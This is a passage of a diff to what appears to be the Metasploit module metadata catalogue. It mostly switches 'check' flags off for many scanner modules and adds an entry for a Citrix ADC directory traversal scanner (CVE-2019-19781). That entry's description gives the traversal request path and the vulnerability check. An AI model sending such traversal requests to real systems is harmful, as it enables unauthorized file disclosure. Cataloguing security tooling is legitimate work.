    "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/afp/afp_server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19089,7 +19136,7 @@
    "path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb",
    "is_install_path": true,
    "ref_name": "scanner/backdoor/energizer_duo_detect",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19127,7 +19174,7 @@
    "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/chargen/chargen_probe",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19224,7 +19271,7 @@
    "path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/couchdb/couchdb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19261,7 +19308,7 @@
    "path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_auth",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -19298,7 +19345,7 @@
    "path": "/modules/auxiliary/scanner/db2/db2_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/db2_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19335,7 +19382,7 @@
    "path": "/modules/auxiliary/scanner/db2/discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/db2/discovery",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19372,7 +19419,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/endpoint_mapper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19409,7 +19456,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/hidden",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19446,7 +19493,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/management.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/management",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19483,7 +19530,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19521,7 +19568,7 @@
    "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/windows_deployment_services",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19632,7 +19679,7 @@
    "path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/arp_sweep",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19669,7 +19716,7 @@
    "path": "/modules/auxiliary/scanner/discovery/empty_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/empty_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19743,7 +19790,7 @@
    "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_neighbor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19818,7 +19865,7 @@
    "path": "/modules/auxiliary/scanner/discovery/udp_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/udp_probe",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19855,7 +19902,7 @@
    "path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/udp_sweep",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19933,7 +19980,7 @@
    "path": "/modules/auxiliary/scanner/dns/dns_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/dns/dns_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19979,7 +20026,7 @@
    "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/elasticsearch/indices_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20016,7 +20063,7 @@
    "path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb",
    "is_install_path": true,
    "ref_name": "scanner/emc/alphastor_devicemanager",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20053,7 +20100,7 @@
    "path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb",
    "is_install_path": true,
    "ref_name": "scanner/emc/alphastor_librarymanager",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20101,7 +20148,7 @@
    "path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/etcd/open_key_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20149,7 +20196,7 @@
    "path": "/modules/auxiliary/scanner/etcd/version.rb",
    "is_install_path": true,
    "ref_name": "scanner/etcd/version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20186,7 +20233,7 @@
    "path": "/modules/auxiliary/scanner/finger/finger_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/finger/finger_users",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20224,7 +20271,7 @@
    "path": "/modules/auxiliary/scanner/ftp/anonymous.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/anonymous",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20382,7 +20429,7 @@
    "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -20420,7 +20467,7 @@
    "path": "/modules/auxiliary/scanner/ftp/ftp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20545,7 +20592,7 @@
    "path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/titanftp_xcrc_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20582,7 +20629,7 @@
    "path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb",
    "is_install_path": true,
    "ref_name": "scanner/gopher/gopher_gophermap",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20621,7 +20668,7 @@
    "path": "/modules/auxiliary/scanner/gprs/gtp_echo.rb",
    "is_install_path": true,
    "ref_name": "scanner/gprs/gtp_echo",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20658,7 +20705,7 @@
    "path": "/modules/auxiliary/scanner/h323/h323_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/h323/h323_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20706,7 +20753,7 @@
    "path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/a10networks_ax_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20753,7 +20800,7 @@
    "path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/accellion_fta_statecode_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20803,7 +20850,7 @@
    "path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/adobe_xml_inject",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20849,7 +20896,7 @@
    "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/advantech_webaccess_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -20949,7 +20996,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_activemq_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20998,7 +21045,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_activemq_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21104,7 +21151,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_optionsbleed",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21155,7 +21202,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_userdir_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21202,7 +21249,7 @@
    "path": "/modules/auxiliary/scanner/http/appletv_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/appletv_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21256,7 +21303,7 @@
    "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/atlassian_crowd_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21303,7 +21350,7 @@
    "path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_local_file_include",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21350,7 +21397,7 @@
    "path": "/modules/auxiliary/scanner/http/axis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21396,7 +21443,7 @@
    "path": "/modules/auxiliary/scanner/http/backup_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/backup_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21444,7 +21491,7 @@
    "path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/barracuda_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21490,7 +21537,7 @@
    "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bavision_cam_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21536,7 +21583,7 @@
    "path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/binom3_login_config_pass_dump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21587,7 +21634,7 @@
    "path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bitweaver_overlay_type_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21633,7 +21680,7 @@
    "path": "/modules/auxiliary/scanner/http/blind_sql_query.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/blind_sql_query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21727,7 +21774,7 @@
    "path": "/modules/auxiliary/scanner/http/brute_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/brute_dirs",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21773,7 +21820,7 @@
    "path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buffalo_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21819,7 +21866,7 @@
    "path": "/modules/auxiliary/scanner/http/buildmaster_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buildmaster_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21869,7 +21916,7 @@
    "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/caidao_bruteforce_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21917,7 +21964,7 @@
    "path": "/modules/auxiliary/scanner/http/canon_wireless.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/canon_wireless",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21954,7 +22001,7 @@
    "path": "/modules/auxiliary/scanner/http/cert.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cert",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22003,7 +22050,7 @@
    "path": "/modules/auxiliary/scanner/http/cgit_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cgit_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22049,7 +22096,7 @@
    "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chef_webui_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22095,7 +22142,7 @@
    "path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chromecast_webserver",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22141,7 +22188,7 @@
    "path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chromecast_wifi",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22187,7 +22234,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_asa_asdm",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22235,7 +22282,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_device_manager",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22332,7 +22379,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_download",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22378,7 +22425,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22427,7 +22474,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ios_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22473,7 +22520,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ironport_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22520,7 +22567,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_nac_manager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22566,7 +22613,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ssl_vpn",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22615,13 +22662,64 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ssl_vpn_priv_esc",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/citrix_dir_traversal": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal Scanner",
+    "fullname": "auxiliary/scanner/http/citrix_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-17",
+    "type": "auxiliary",
+    "author": [
+      "Erik Wynter",
+      "altonjx"
+    ],
+    "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n        a \"[global]\" directive in smb.conf, which this file should always contain.",
+    "references": [
+      "CVE-2019-19781",
+      "URL-https://support.citrix.com/article/CTX267027/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-14 11:21:03 +0000",
+    "path": "/modules/auxiliary/scanner/http/citrix_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/citrix_dir_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/clansphere_traversal": {
    "name": "ClanSphere 2011.3 Local File Inclusion Vulnerability",
    "fullname": "auxiliary/scanner/http/clansphere_traversal",
@@ -22663,7 +22761,7 @@
    "path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/clansphere_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22710,7 +22808,7 @@
    "path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cnpilot_r_web_login_loot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22761,7 +22859,7 @@
    "path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/coldfusion_locale_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22808,7 +22906,7 @@
    "path": "/modules/auxiliary/scanner/http/coldfusion_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/coldfusion_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22856,7 +22954,7 @@
    "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/concrete5_member_list",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22902,7 +23000,7 @@
    "path": "/modules/auxiliary/scanner/http/copy_of_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/copy_of_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22995,7 +23093,7 @@
    "path": "/modules/auxiliary/scanner/http/dell_idrac.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dell_idrac",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23042,7 +23140,7 @@
    "path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dicoogle_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23088,7 +23186,7 @@
    "path": "/modules/auxiliary/scanner/http/dir_listing.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_listing",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23134,7 +23232,7 @@
    "path": "/modules/auxiliary/scanner/http/dir_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23184,7 +23282,7 @@
    "path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23230,7 +23328,7 @@
    "path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/directadmin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23277,7 +23375,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_300_615_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23324,7 +23422,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_615h_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23371,7 +23469,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_session_cgi_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23419,7 +23517,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_user_agent_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23468,7 +23566,7 @@
    "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dnalims_file_retrieve",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23514,7 +23612,7 @@
    "path": "/modules/auxiliary/scanner/http/docker_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/docker_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23560,7 +23658,7 @@
    "path": "/modules/auxiliary/scanner/http/dolibarr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dolibarr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23654,7 +23752,7 @@
    "path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ektron_cms400net",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23786,7 +23884,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_config",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23833,7 +23931,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_hashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23880,7 +23978,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_get_chart_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23927,7 +24025,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_ping_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23974,7 +24072,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_reset_pass",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24020,7 +24118,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -24066,7 +24164,7 @@
    "path": "/modules/auxiliary/scanner/http/error_sql_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/error_sql_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24118,7 +24216,7 @@
    "path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/es_file_explorer_open_port",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24164,7 +24262,7 @@
    "path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/etherpad_duo_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -24260,7 +24358,7 @@
    "path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/f5_bigip_virtual_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24308,7 +24406,7 @@
    "path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/f5_mgmt_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24354,7 +24452,7 @@
    "path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/file_same_name_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24400,7 +24498,7 @@
    "path": "/modules/auxiliary/scanner/http/files_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/files_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24446,7 +24544,7 @@
    "path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/fortinet_ssl_vpn",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -24495,7 +24593,7 @@
    "path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/frontpage_credential_dump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24542,7 +24640,7 @@
    "path": "/modules/auxiliary/scanner/http/frontpage_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/frontpage_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24588,7 +24686,7 @@
    "path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gavazzi_em_login_loot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24635,7 +24733,7 @@
    "path": "/modules/auxiliary/scanner/http/git_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/git_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24681,7 +24779,7 @@
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24727,7 +24825,7 @@
